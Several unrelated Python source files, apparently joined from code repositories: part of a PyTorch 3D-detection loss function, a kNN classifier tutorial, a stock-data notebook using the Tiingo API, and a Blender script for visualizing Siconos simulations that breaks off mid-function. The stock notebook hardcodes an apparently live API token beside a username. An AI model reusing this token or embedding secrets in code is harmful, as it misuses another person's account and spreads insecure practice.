# # extra_rot_loss += 0.5 * self.compute_rot_loss(ry_e.unsqueeze(1), ry_g.unsqueeze(1), torch.ones_like(ry_g.unsqueeze(1)))
# extra_size_loss += torch.mean(torch.sum(self.smoothl1(size_e, size_g), dim=1))
# extra_offset_loss += torch.mean(torch.sum(self.smoothl1(offset_e, offset_g), dim=1))
# extra_rot_loss += self.compute_rot_loss(ry_e.unsqueeze(1), ry_g.unsqueeze(1), torch.ones_like(ry_g.unsqueeze(1)))
# normalizer += 1
# else:
# # print('discarding; mindist:', mindist.squeeze().detach().cpu().numpy())
# pass
# if normalizer > 0:
# total_loss = utils.misc.add_loss('center2d/extra_size_loss', total_loss, extra_size_loss/normalizer, 0.1, sw)
# total_loss = utils.misc.add_loss('center2d/extra_offset_loss', total_loss, extra_offset_loss/normalizer, 0.1, sw)
# total_loss = utils.misc.add_loss('center2d/extra_rot_loss', total_loss, extra_rot_loss/normalizer, 0.1, sw)
if (sw is not None and sw.save_this) or force_export_boxlist:
# xyzlist_cam_e = vox_util.Mem2Ref(xyzlist_mem_e + offsetlist_e, Z, Y, X, assert_cube=False)
boxlist = scorelist_e.new_zeros((B, self.K, 9))
scorelist = scorelist_e.new_zeros((B, self.K))
for b in list(range(B)):
boxlist_b = []
scorelist_b = []
for k in list(range(self.K)):
score = scorelist_e[b:b+1, k]
# print('score', score.shape)
# print('score', score.squeeze().shape)
# let's call it a real object
if score.squeeze() > self.thresh:
# xyz = xyzlist_mem_e[b:b+1, k]
xyz = xyzlist_cam_e[b:b+1, k] # 1,3
size = sizelist_e[b:b+1, k] # 1,3
ry = rylist_e[b:b+1, k] # 1,num_rot_bins
# i need to convert this into an actual rot
ry = ry.squeeze()
ry_ind = torch.argmax(ry)
ry = self.bin_angles[ry_ind].reshape(1)
rz = torch.zeros_like(ry)
rx = torch.zeros_like(ry)
rot = torch.stack([rx, ry, rz], dim=1) # 1, 3
box = torch.cat([xyz, size, rot], dim=1)
boxlist_b.append(box)
scorelist_b.append(score)
if len(boxlist_b) > 0:
boxlist_b = torch.stack(boxlist_b, dim=1) # 1 x ? x 3
scorelist_b = torch.stack(scorelist_b, dim=1) # 1 x ? x 1
boxlist_b = torch.cat((boxlist_b, torch.zeros([1, self.K, 9]).cuda()), dim=1)
scorelist_b = torch.cat((scorelist_b, torch.zeros([1, self.K]).cuda()), dim=1)
boxlist_b = boxlist_b[:, :self.K]
scorelist_b = scorelist_b[:, :self.K]
else:
boxlist_b = torch.zeros([1, self.K, 9]).cuda()
scorelist_b = torch.zeros([1, self.K]).cuda()
boxlist[b:b+1] = boxlist_b
scorelist[b:b+1] = scorelist_b
lrtlist_cam = utils.geom.convert_boxlist_to_lrtlist(boxlist)
if sw is not None and sw.save_this:
sw.summ_lrtlist_bev(
'center2d/lrtlist_mem_e',
occ_mem,
lrtlist_cam[0:1],
scorelist[0:1], # scores
torch.ones(1,self.K).long().cuda(), # tids
vox_util,
already_mem=False)
sw.summ_lrtlist_bev(
'center2d/lrtlist_mem_g',
occ_mem,
lrtlist_cam_g[0:1],
scorelist_g[0:1], # scores
torch.ones_like(scorelist_g).long(), # tids
vox_util,
already_mem=False)
else:
lrtlist_cam = None
scorelist = None
if sw is not None and sw.save_this:
sw.summ_oned('center2d/center_e_sig', center_e_sig, norm=False)
seg_e_sig = F.interpolate(torch.sigmoid(seg_e), scale_factor=self.stride)
pos_e = (seg_e_sig > 0.8).float()
neg_e = (seg_e_sig < 0.2).float()
# show the occ estimates
pos_e = pos_e * occ_mem
neg_e = neg_e * occ_mem
pos_bev = torch.max(pos_e, dim=3)[0]
neg_bev = torch.max(neg_e, dim=3)[0]
seg_bev = torch.cat([pos_bev, neg_bev], dim=1)
seg_vis = sw.summ_soft_seg_thr('', seg_bev, colormap='tab10', only_return=True)
occ_vis = sw.summ_occ('', occ_mem, only_return=True)
seg_vis = utils.improc.preprocess_color(seg_vis).cuda()
occ_vis = utils.improc.preprocess_color(occ_vis).cuda()
sw.summ_rgb('center2d/seg_e_on_occ', (occ_vis + seg_vis)/2.0)
sw.summ_oned('center2d/seg_e_sig', torch.mean(seg_e_sig, dim=3), norm=True)
return total_loss, lrtlist_cam, scorelist, seg_e
|
<reponame>Phoenix1327/MLA<filename>kNN/kNNbase.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'Administrator'
from kNN import *
def createDataSet():
group = np.array([[1.0,1.1],[1.0,1.0],[0,0],[0,0.1]])
labels = ['A','A','B','B']
return group, labels
def classify0(inX, dataSet, labels, k):
dataSetSize = dataSet.shape[0]
featureSize = dataSet.shape[1]
diffMat = np.tile(inX, (dataSetSize,1)) - dataSet #dataSetSize * featureSize
sqDiffMat = diffMat**2
sqDistances = sqDiffMat.sum(axis=1)#dataSetSize * 1
distances = sqDistances**0.5
sortedDistIndicies = distances.argsort(axis=None)
classCount = {}
for i in range(k):
voteIlabel = labels[sortedDistIndicies[i]]
classCount[voteIlabel] = classCount.get(voteIlabel,0) + 1
sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1), reverse=True)
return sortedClassCount[0][0]
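# A minimal usage sketch of classify0 with the toy dataset above (illustrative only):
def classify0_example():
    group, labels = createDataSet()
    # the query point lies next to the 'B' cluster, so the 3-NN vote returns 'B'
    return classify0(np.array([0.2, 0.1]), group, labels, 3)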
def label2int(label):
if label == 'largeDoses':
return 3
elif label == 'smallDoses':
return 2
else:
return 1
def file2matrix(filename):
fr = open(filename)
dataLines = fr.readlines()
dataSize = len(dataLines)
returnMat = np.zeros((dataSize, 3))
classLabelVector = []
index = 0
for line in dataLines:
line = line.strip()
linelist = line.split('\t')
returnMat[index,:] = linelist[0:3]
classLabelVector.append(label2int(linelist[-1]))
index += 1
return returnMat, classLabelVector
def plt3DData(mat, labelvector, norm=False):
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for c, m, classidx, label in [('r', 'o', 1, 'didntLike'), ('b', '^', 2, 'smallDoses'), ('g', 's', 3, 'largeDoses')]:
idx = [i for i,a in enumerate(labelvector) if a==classidx]
features = mat[idx][:]
xs = features[:,0]
ys = features[:,1]
zs = features[:,2]
if norm:
xs = (xs - xs.min(0))/(xs.max(0) - xs.min(0))
ys = (ys - ys.min(0))/(ys.max(0) - ys.min(0))
zs = (zs - zs.min(0))/(zs.max(0) - zs.min(0))
ax.scatter(xs, ys, zs, c=c, marker=m, label=c+': '+label)
ax.set_xlabel('Frequent flyer miles earned per year')
ax.set_ylabel('Liters of ice cream consumed per week')
ax.set_zlabel('Percentage of time spent playing video games')
plt.legend()
plt.grid(True)
plt.show()
def autoNorm(dataSet):
minVals = dataSet.min(0)
maxVals = dataSet.max(0)
ranges = maxVals - minVals
normDataSet = np.zeros(dataSet.shape)
dataSize = dataSet.shape[0]
normDataSet = dataSet - np.tile(minVals, (dataSize,1))
normDataSet = normDataSet / np.tile(ranges, (dataSize,1))
return normDataSet, ranges, minVals
def datingClassTest(k, hoRatio, datingDataMat, datingLabels):
normMat, ranges, minVals = autoNorm(datingDataMat)
dataSize = normMat.shape[0]
numTestVecs = int(dataSize * hoRatio)
errorCount = 0.0
for i in range(numTestVecs):
Result = classify0(normMat[i,:], normMat[numTestVecs:,:],\
datingLabels[numTestVecs:],k)
print("the classifier came back with: %d, the real answer is: %d"\
% (Result, datingLabels[i]))
if not Result == datingLabels[i]:
errorCount += 1
print("the total error rate is: %0.2f%%" % (errorCount/float(numTestVecs)*100))
def img2vector(filename):
fr = open(filename)
dataLines = fr.readlines()
datastr = ''
for line in dataLines:
datastr += line.strip()
datalist = list(datastr)
datalist = list(map(int, datalist))
return np.asarray(datalist).reshape(1,len(datalist))
def handwritingClassTest(datapath, k=3):
hwLabels = []
abspath = os.path.abspath('.')
trainData_dirname = 'trainingDigits'
testData_dirname = 'testDigits'
trainfilepath = os.path.join(datapath, trainData_dirname)
trainingFileList = os.listdir(trainfilepath)
size = len(trainingFileList)
trainingMat = np.zeros((size,1024))
for i in range(size):
fileNameStr = trainingFileList[i]
classNumstr = int(fileNameStr.split('_')[0])
hwLabels.append(classNumstr)
trainingMat[i,:] = img2vector(os.path.join(trainfilepath, fileNameStr))
testfilepath = os.path.join(datapath, testData_dirname)
testFileList = os.listdir(testfilepath)
errorCount = 0.0
sizeTest = len(testFileList)
for i in range(sizeTest):
fileNameStr = testFileList[i]
classNumstr = int(fileNameStr.split('_')[0])
vecUnderTest = img2vector(os.path.join(testfilepath, fileNameStr))
Result = classify0(vecUnderTest, trainingMat, hwLabels, k)
print('the classfier came back with: %d, the real answer is: %d'\
% (Result, classNumstr))
if not Result == classNumstr:
errorCount += 1.0
print("the total error rate is: %0.2f%%" % (errorCount/float(sizeTest)*100))
|
<gh_stars>1-10
#!/usr/bin/env python
# coding: utf-8
# In[1]:
#Here add a description
# In[2]:
'''
Importing all the needed libraries
'''
#Data Structure, scientific computing and technical computing.
import numpy as np
import pandas as pd
import pandas_datareader.data as web # pip install pandas_datareader
#Dataframe
import pandas_datareader as pdr
#Scipy: scientific computing
import scipy
from scipy.spatial.distance import pdist, squareform
from scipy.spatial import distance_matrix
from scipy import stats
#Visualization
import plotly.graph_objs as go
import matplotlib.pyplot as plt
import seaborn as sns
# machine learning library for the Python programming language.
from sklearn.neighbors import KernelDensity
#Dataset
import yfinance as yf #pip install yfinance
#Date formatting
#Today's date
from datetime import date, timedelta
from dateutil.relativedelta import relativedelta
#Statistics
import scipy
#Past six month function
def past_six_month_date():
# libraries
from datetime import date, timedelta
from dateutil.relativedelta import relativedelta
# empty list
mylist = []
#Processing six months back
sixp = date.today() - relativedelta(months=+6)
mylist.append(sixp)
return f"{mylist[0]:%Y-%m-%d}"
six_months_ago = past_six_month_date()
today = date.today()
#For printing results
#print("Today's date:", today)
#print("Exactly 6 months date:", six_months_ago)
# ### Implementing tiingo.com:
# A financial research platform dedicated to creating innovative financial tools for all, while adopting the motto, **"Actively Do Good"**.
#
# In[3]:
Login = 'bunster'
pw = '<PASSWORD>'
start = six_months_ago
end = today
TICKERS = [ 'AAPL','MSFT', 'Goog', 'AMZN', 'TSLA']
apiURL= 'https://api.tiingo.com/documentation/end-of-day'
token = '2d10bb042e786244063efc000e6dc15e79b07274'
# In[4]:
def get_adjusted_close(ticker, start, end, token):
import pandas_datareader as pdr
df = pdr.get_data_tiingo(ticker, start, end, api_key=token)
return df
# In[5]:
def returned_dataFrame(list_of_frame):
df = pd.concat(list_of_frame)
return df
# In[6]:
def build_dataset(ticker):
from tiingo import TiingoClient
config = {}
# To reuse the same HTTP Session across API calls (and have better performance),
config['session'] = True
# If you don't have your API key as an environment variable,
# pass it in via a configuration dictionary.
config['api_key'] = "2d10bb042e786244063efc000e6dc15e79b07274"
# Initialize
client = TiingoClient(config)
df = client.get_dataframe(ticker, startDate = six_months_ago, endDate= today, frequency='daily', metric_name=None)
return df
# In[7]:
#df = build_dataset('AAPL')
# In[8]:
TICKERS_Frames = ['AAPL', 'MSFT', 'Goog', 'AMZN', 'TSLA']
AAPL = build_dataset(TICKERS_Frames[0])
MSFT = build_dataset(TICKERS_Frames[1])
Goog = build_dataset(TICKERS_Frames[2])
AMZN = build_dataset(TICKERS_Frames[3])
TSLA = build_dataset(TICKERS_Frames[4])
AAPL['Ticker']= 'AAPL'
MSFT['Ticker']= 'MSFT'
Goog['Ticker']= 'Goog'
AMZN['Ticker']= 'AMZN'
TSLA['Ticker']= 'TSLA'
Frames = [ AAPL, MSFT, Goog, AMZN, TSLA]
df = pd.concat(Frames)
# In[ ]:
#
#
|
<gh_stars>0
#! /usr/bin/env python3
# Blender scripts
#author <NAME>
#copyright 2016-2017 INRIA. Licensed under the Apache License, Version 2.0.
#(see @ref LICENSE or http://www.apache.org/licenses/LICENSE-2.0)
#needs blender. Run it from the command line: blender --python siconosv.py
#to run it headless (without the GUI): blender --background --python siconosv.py
#framerate given to the function should correspond to the timestep of the simulation
import bpy
import shlex
import mathutils
import sys
import numpy
import time
import math
import random
bl_info = {
"name": "Siconos Visualization",
"author": "<NAME>",
"version": (1, 0),
"blender": (2, 6, 3),
"description": "Visualizes scenes from Siconos simulations",
"warning": "May contain bugs!",
"wiki_url": "",
"tracker_url": "",
"category": "Animation"
}
#main simulation class
#1)in the future for visualizing contact forces I'll make a switch in the inject keyframes function
#2)ways to handle compound shapes in blender
#3)ways to handle mesh shapes in blender
class Simulation(object):
def __init__(self, shape_filename='ref.txt', input_filename='input.dat', bind_filename='bindings.dat', dpos_filename='dpos.dat', spos_filename='spos.dat'):
self.shape_filename_ = shape_filename
self.input_filename_ = input_filename
self.bind_filename_ = bind_filename
self.dpos_filename_ = dpos_filename
self.spos_filename_ = spos_filename
#symbols recognizable by the parser
self.symbols_ = ['Cone', 'Sphere', 'Box', 'Plane', 'Cylinder', 'Pyramid', 'Capsule']
#dictionary for holding number of instances of each primitive
self.instance_counters_ = dict()
#dictionary holding moving objects on the scene - 'name_of_the_object':array_with_animation_data
self.movables_ = dict()
#dictionary holding the bindings from the bindings.dat file
self.bindings_ = dict()
def strToVect(self, st):
tmp = st.split(' ')
vec = []
for num in tmp:
num = float(num)
vec.append(num)
return vec
def applyTransform(self, position, quaternion):
ob = bpy.context.object
ob.rotation_mode = 'QUATERNION'
ob.rotation_quaternion = quaternion
ob.location = position
return ob
def quatToEul(self, quaternion):
q = mathutils.Quaternion(quaternion)
e = q.to_euler()
eul = [e.x, e.y, e.z]
return numpy.array(eul)
def makeMaterial(self, name, diffuse, alpha):
mat = bpy.data.materials.new(name)
mat.diffuse_color = diffuse
mat.diffuse_shader = 'LAMBERT'
mat.diffuse_intensity = 1.0
mat.specular_intensity = 0.5
mat.alpha = alpha
mat.ambient = 1
return mat
def setMaterial(self, ob, mat):
me = ob.data
me.materials.append(mat)
def assignMaterials(self, di):
#di is a dictionary with id:rgb pairs
mat = {}
for i in di.keys():
#making materials
tmp = self.makeMaterial('mat' + str(i), di[i], 1) #makeMaterial expects (name, diffuse, alpha)
mat[i] = tmp
for ob in bpy.data.objects:
l = ob.name.split("_")
#if the object's name is of the form "object_num_num" then the material's assignment will execute
if len(l) > 1:
self.setMaterial(ob, mat[int(l[1])])
else:
continue
return
def createForceArrow(self, x, y, z, n, lbd = 0):
"""Creates an arrow from a given point along a given vector
x,y,z is point to go from, n is a noral vector, and lbd is a scaling factor"""
v = mathutils.Vector((x,y,z))
up = mathutils.Vector((n[0],n[1],n[2]))
rotation_quat = up.to_track_quat('Z', 'Y')
my_Cylinder = bpy.ops.mesh.primitive_cylinder_add(vertices=16, radius=0.01, depth=lbd)
ob1 = bpy.context.object
ob1.name = 'my_Cylinder'
bpy.ops.transform.translate(value=(0,0,(lbd/2+v.length)))
my_Cone = bpy.ops.mesh.primitive_cone_add(vertices=40, radius1=0.1, radius2=0, depth=0.5, location=(0, 0, 0), rotation=(0, 0, 0))
ob2 = bpy.context.object
ob2.name = 'my_Cone'
bpy.ops.transform.translate(value=(0,0,(lbd+v.length)))
ob1.select = True
ob2.select = True
bpy.ops.object.join()
#change location of tooltip to the bottom of the arrow
newLoc = mathutils.Vector((0, 0, v.length))
bpy.context.scene.cursor_location = newLoc
bpy.ops.object.origin_set(type='ORIGIN_CURSOR')
ob = bpy.context.object
myName = 'Arrow'
col = mathutils.Color((random.random(), random.random(), random.random()))
ob.name = myName
ob.show_name = True
me = ob.data
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
ob.rotation_mode = 'QUATERNION'
ob.rotation_quaternion = rotation_quat
ob.location = v
return ob
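#illustrative sketch (not part of the original script): draw a unit-length force arrow
#at the origin pointing along +z; the numbers are made up for this example and it must
#run inside a Blender session
#sim = Simulation()
#sim.createForceArrow(0.0, 0.0, 0.0, [0.0, 0.0, 1.0], lbd=1.0)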
def createContactCone(self, x, y, z, mu):
"""Creates an inversed cone with the top placed at a given point, mu is a
friction coeff"""
#create an inversed cone at the specified point
pos = mathutils.Vector((x,y,z))
eul = mathutils.Euler((0.0, math.radians(180.0), 0.0), 'XYZ')
myName = 'Cone'
my_Cone = bpy.ops.mesh.primitive_cone_add(vertices=40, radius1=mu, radius2=0, depth=1, location=pos, rotation=eul)
bpy.ops.transform.translate(value=(0,0,0.5))
ob = bpy.context.object
#shift the tooltip to the bottom of the cone
bpy.context.scene.cursor_location = pos
bpy.ops.object.origin_set(type='ORIGIN_CURSOR')
#give a random color to the cone
col = mathutils.Color((random.random(), random.random(), random.random()))
ob.name = myName
ob.show_name = True
me = ob.data
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
me.name = myName + '_' + 'Mesh'
return ob
def makePyramid(self, li):
#object geometric parameters
params = self.strToVect(' '.join(li[1:3]))
myName = 'Pyramid' + '_' + str(li[3])
#if object is dynamic create an entry in the movables dictionary
if int(li[3]) > 0:
self.movables_[myName] = numpy.empty(0)
my_Pyramid = bpy.ops.mesh.primitive_cone_add(vertices=4, radius1=params[0], radius2=0, depth=params[1], location=self.strToVect(' '.join(li[6:9])), rotation=self.quatToEul(self.strToVect(' '.join(li[9:13]))))
ob = bpy.context.object
ob.name = myName
ob.show_name = True
me = ob.data
me.name = myName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def makeCone(self, li):
#object geometric parameters
params = self.strToVect(' '.join(li[1:3]))
myName = 'Cone' + '_' + str(li[3])
#if object is dynamic create an entry in the movables dictionary
if int(li[3]) > 0:
self.movables_[myName] = numpy.empty(0)
my_Cone = bpy.ops.mesh.primitive_cone_add(vertices=40, radius1=params[0], radius2=0, depth=params[1], location=self.strToVect(' '.join(li[6:9])), rotation=self.quatToEul(self.strToVect(' '.join(li[9:13]))))
ob = bpy.context.object
ob.name = myName
ob.show_name = True
me = ob.data
me.name = myName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def makeBox(self, li):
#object geometric parameters
params = self.strToVect(' '.join(li[1:4]))
#divide by two to scale correctly
params = [i/2 for i in params]
myName = 'Box' + '_' + str(li[4])
#if object is dynamic create an entry in the movables dictionary
if int(li[4]) > 0:
self.movables_[myName] = numpy.empty(0)
my_Box = bpy.ops.mesh.primitive_cube_add(location=self.strToVect(' '.join(li[7:10])), rotation=self.quatToEul(self.strToVect(' '.join(li[10:14]))))
ob = bpy.context.object
ob.scale=(params)
ob.name = myName
ob.show_name = True
me = ob.data
me.name = myName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def makeSphere(self, li):
#object geometric parameters
params = self.strToVect(''.join(li[1]))
myName = 'Sphere' + '_' + str(li[2])
#if object is dynamic create an entry in the movables dictionary
if int(li[2]) > 0:
self.movables_[myName] = numpy.empty(0)
my_Sphere = bpy.ops.mesh.primitive_uv_sphere_add(size=params[0], location=self.strToVect(' '.join(li[5:8])))
ob = bpy.context.object
ob.name = myName
ob.show_name = True
me = ob.data
me.name = myName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def makeCylinder(self, li):
#object geometric parameters
params = self.strToVect(' '.join(li[1:3]))
myName = 'Cylinder' + '_' + str(li[3])
#if object is dynamic create an entry in the movables dictionary
if int(li[3]) > 0:
self.movables_[myName] = numpy.empty(0)
rot = self.quatToEul(self.strToVect(' '.join(li[9:13])))
#we rotate the cylinder to make it along the y-axis as in bullet
eul = mathutils.Euler(rot)
eul.rotate_axis('Y', math.radians(90))
my_Cylinder = bpy.ops.mesh.primitive_cylinder_add(radius=params[0], depth=params[1], location=self.strToVect(' '.join(li[6:9])), rotation=eul)
ob = bpy.context.object
#below line puts the applied rotation into effect
bpy.ops.object.transform_apply(rotation = True)
ob.name = myName
ob.show_name = True
me = ob.data
me.name = myName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def makeCapsule(self, li):
#object geometric parameters
params = self.strToVect(' '.join(li[1:3]))
myFinalName = 'Capsule' + '_' + str(li[3])
#if object is dynamic create an entry in the movables dictionary
if int(li[3]) > 0:
self.movables_[myFinalName] = numpy.empty(0)
rot = self.quatToEul(self.strToVect(' '.join(li[9:13])))
loc = self.strToVect(' '.join(li[6:9]))
rad = params[0]
height = params[1]
#we create a capsule shape from a cylinder and two spheres
my_Sphere1 = bpy.ops.mesh.primitive_uv_sphere_add(size=rad, location=(0,0,height/2), rotation=(0,0,0))
ob1 = bpy.context.object
ob1.name = 'my_Sphere1'
my_Sphere2 = bpy.ops.mesh.primitive_uv_sphere_add(size=rad, location=(0,0,-height/2), rotation=(0,0,0))
ob2 = bpy.context.object
ob2.name = 'my_Sphere2'
my_Cylinder = bpy.ops.mesh.primitive_cylinder_add(radius=rad, depth=height, location=(0,0,0), rotation=(0,0,0))
ob3 = bpy.context.object
ob3.name = 'my_Cylinder'
ob1.select = True
ob2.select = True
ob3.select = True
bpy.ops.object.join()
ob = bpy.context.object
#we rotate the capsule to make it along the y-axis as in bullet
eul = mathutils.Euler(rot)
eul.rotate_axis('Y', math.radians(90))
ob.rotation_euler = eul
#below line puts the applied rotation into effect
bpy.ops.object.transform_apply(rotation = True)
ob.name = myFinalName
ob.show_name = True
me = ob.data
me.name = myFinalName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def makePlane(self, li):
#object geometric parameters
params = self.strToVect(' '.join(li[1:4]))
#divide by two to scale correctly
params = [i/2 for i in params]
myName = 'Plane' + '_' + str(li[4])
#if object is dynamic create an entry in the movables dictionary
if int(li[4]) > 0:
self.movables_[myName] = numpy.empty(0)
my_Plane = bpy.ops.mesh.primitive_plane_add(location=self.strToVect(' '.join(li[7:10])), rotation=self.quatToEul(self.strToVect(' '.join(li[10:14]))))
ob = bpy.context.object
ob.scale=(params)
ob.name = myName
ob.show_name = True
me = ob.data
me.name = myName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def makeStlMesh(self, li):
"""Function to read an .stl mesh from the file and instantiate it on the scene"""
myName = 'My_Mesh' + '_' + str(li[1])
#if object is dynamic create an entry in the movables dictionary
if int(li[1]) > 0:
self.movables_[myName] = numpy.empty(0)
my_mesh = bpy.ops.import_mesh.stl(filepath=li[0])
ob = bpy.context.selected_objects[0]
ob.location = self.strToVect(' '.join(li[4:7]))
ob.rotation_euler = self.quatToEul(self.strToVect(' '.join(li[7:11])))
ob.name = myName
ob.show_name = True
me = ob.data
me.name = myName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def prepareInput(self):
"""Prepares input to drawScene function (reads from ref.txt and input.dat).
Returns a list of strings read by the drawScene() function.
This function also fills the dictionary from the bindings.dat file"""
# get the bindings of the objects
with open(self.bind_filename_, 'r') as bind_file:
bind_lines = bind_file.readlines()
for bind_line in bind_lines:
lex = shlex.split(bind_line)
self.bindings_[int(lex[0])] = [int(lex[1])]
# dictionary with pairs : position in the file (line number) - primitive specification
shapes = dict()
# function's output - a list with strings which are inputs to the drawScene() function
drawScene_input = list()
with open(self.input_filename_, 'r') as finput, open(self.shape_filename_, 'r') as fshapes:
shape_lines = fshapes.readlines()
for idx, shape_line in enumerate(shape_lines):
shapes[idx] = shape_line.replace("\n", "")
self.instance_counters_[shapes[idx].split()[0]] = 0
input_lines = finput.readlines()
for idx, input_line in enumerate(input_lines):
lex = shlex.split(input_line)
#static (negative id) and dynamic objects are serialized in the same way
newLine = shapes[int(lex[0])] + ' ' + str(lex[1]) + ' ' + ' '.join(lex[1:])
drawScene_input.append(newLine)
return drawScene_input
def drawScene(self):
"""Visualizes the initial scene state - places objects from the list returned by prepareInput()
in their initial state. Returns a scene with objects placed at their initial positions and
with their attributes"""
scn = bpy.context.scene
bpy.ops.object.select_by_type(type='MESH')
bpy.ops.object.delete()
lines = self.prepareInput()
spos = numpy.loadtxt(self.spos_filename_)
#slicing of spos to get the id's vector (handling the 1D case of spos)
if spos.ndim == 1:
spos_id_slice = numpy.array([spos[1]])
else:
spos_id_slice = spos[:, 1]
for line in lines:
lex = shlex.split(line)
symbol = lex[0]
if symbol in self.symbols_:
#instantiation of objects
if symbol == 'Box':
self.instance_counters_[symbol] += 1
self.makeBox(lex)
if numpy.where(spos_id_slice == float(lex[5]))[0].size != 0:
if spos.ndim == 1:
self.applyTransform(spos[2:5], spos[5:])
else:
self.applyTransform(spos[numpy.where(spos_id_slice == float(lex[5]))][0, 2:5], spos[numpy.where(spos_id_slice == float(lex[5]))][0, 5:])
elif symbol == 'Sphere':
self.instance_counters_[symbol] += 1
self.makeSphere(lex)
if numpy.where(spos_id_slice == float(lex[3]))[0].size != 0:
if spos.ndim == 1:
self.applyTransform(spos[2:5], spos[5:])
else:
self.applyTransform(spos[numpy.where(spos_id_slice == float(lex[3]))][0, 2:5], spos[numpy.where(spos_id_slice == float(lex[3]))][0, 5:])
elif symbol == 'Cylinder':
self.instance_counters_[symbol] += 1
self.makeCylinder(lex)
if numpy.where(spos_id_slice == float(lex[4]))[0].size != 0:
if spos.ndim == 1:
self.applyTransform(spos[2:5], spos[5:])
else:
self.applyTransform(spos[numpy.where(spos_id_slice == float(lex[4]))][0, 2:5], spos[numpy.where(spos_id_slice == float(lex[4]))][0, 5:])
elif symbol == 'Plane':
self.instance_counters_[symbol] += 1
self.makePlane(lex)
if numpy.where(spos_id_slice == float(lex[5]))[0].size != 0:
if spos.ndim == 1:
self.applyTransform(spos[2:5], spos[5:])
else:
self.applyTransform(spos[numpy.where(spos_id_slice == float(lex[5]))][0, 2:5], spos[numpy.where(spos_id_slice == float(lex[5]))][0, 5:])
elif symbol == 'Cone':
self.instance_counters_[symbol] += 1
self.makeCone(lex)
if numpy.where(spos_id_slice == float(lex[4]))[0].size != 0:
if spos.ndim == 1:
self.applyTransform(spos[2:5], spos[5:])
else:
self.applyTransform(spos[numpy.where(spos_id_slice == float(lex[4]))][0, 2:5], spos[numpy.where(spos_id_slice == float(lex[4]))][0, 5:])
elif symbol == 'Pyramid':
self.instance_counters_[symbol] += 1
self.makePyramid(lex)
if numpy.where(spos_id_slice == float(lex[4]))[0].size != 0:
if spos.ndim == 1:
self.applyTransform(spos[2:5], spos[5:])
else:
self.applyTransform(spos[numpy.where(spos_id_slice == float(lex[4]))][0, 2:5], spos[numpy.where(spos_id_slice == float(lex[4]))][0, 5:])
elif symbol == 'Capsule':
self.instance_counters_[symbol] += 1
self.makeCapsule(lex)
if numpy.where(spos_id_slice == float(lex[4]))[0].size != 0:
if spos.ndim == 1:
self.applyTransform(spos[2:5], spos[5:])
else:
self.applyTransform(spos[numpy.where(spos_id_slice == float(lex[4]))][0, 2:5], spos[numpy.where(spos_id_slice == float(lex[4]))][0, 5:])
elif '.stl' in symbol:
self.instance_counters_[symbol] += 1
self.makeStlMesh(lex)
bpy.ops.object.select_all()
return scn
def injectKeyframes(self):
"""Injects keyframes in dynamic objects on the scene (reads from dpos.dat)"""
#calculating frameRate, the number of animation frames per simulation step (assuming 24 fps)
#simTime and timeStep are in seconds
#if the simulation lasts 10 s then at 24 fps we need
#240 frames for the whole animation.
#if the simulation lasts 10 s with a timestep of 0.005 s
#then there are 2000 steps in the simulation.
#to get the number of frames per simulation step we divide the total number of
#frames by the total number of steps: 240/2000 = 0.12 frames per step.
scn = bpy.context.scene
#time evolution loading
dpos = numpy.loadtxt(self.dpos_filename_, ndmin=2)
#calculating simTime and timeStep
simTime = dpos[:, 0][dpos[:, 0].size - 1]
timeStep = dpos[:, 0][numpy.where(dpos[:, 0] == 0)[0].size + 1] - dpos[:, 0][0]
frameRate = (24*simTime)/(simTime/timeStep)
#getting and preparing the scene
frame_num = 0
frame_total = simTime*24
bpy.context.scene.frame_start = frame_num
bpy.context.scene.frame_end = frame_total
#picking lines corresponding to respective id's
#appending numpy arrays to the dictionary
for key in self.movables_.keys():
idx = int(key.split("_")[1])
self.movables_[key] = dpos[numpy.where(dpos[:,1] == idx)]
#Creation of actions for objects
objects = self.movables_.keys()
for obj in bpy.data.objects:
obj.rotation_mode = 'QUATERNION'
if obj.name in objects:
obj.animation_data_create()
obj.animation_data.action = bpy.data.actions.new(name="MyAction")
fcu_x = obj.animation_data.action.fcurves.new(data_path="location", index=0)
fcu_y = obj.animation_data.action.fcurves.new(data_path="location", index=1)
fcu_z = obj.animation_data.action.fcurves.new(data_path="location", index=2)
fcu_rot0 = obj.animation_data.action.fcurves.new(data_path="rotation_quaternion", index=0)
fcu_rot1 = obj.animation_data.action.fcurves.new(data_path="rotation_quaternion", index=1)
fcu_rot2 = obj.animation_data.action.fcurves.new(data_path="rotation_quaternion", index=2)
fcu_rot3 = obj.animation_data.action.fcurves.new(data_path="rotation_quaternion", index=3)
fcu_x.keyframe_points.add(len(self.movables_[obj.name]))
fcu_y.keyframe_points.add(len(self.movables_[obj.name]))
fcu_z.keyframe_points.add(len(self.movables_[obj.name]))
fcu_rot0.keyframe_points.add(len(self.movables_[obj.name]))
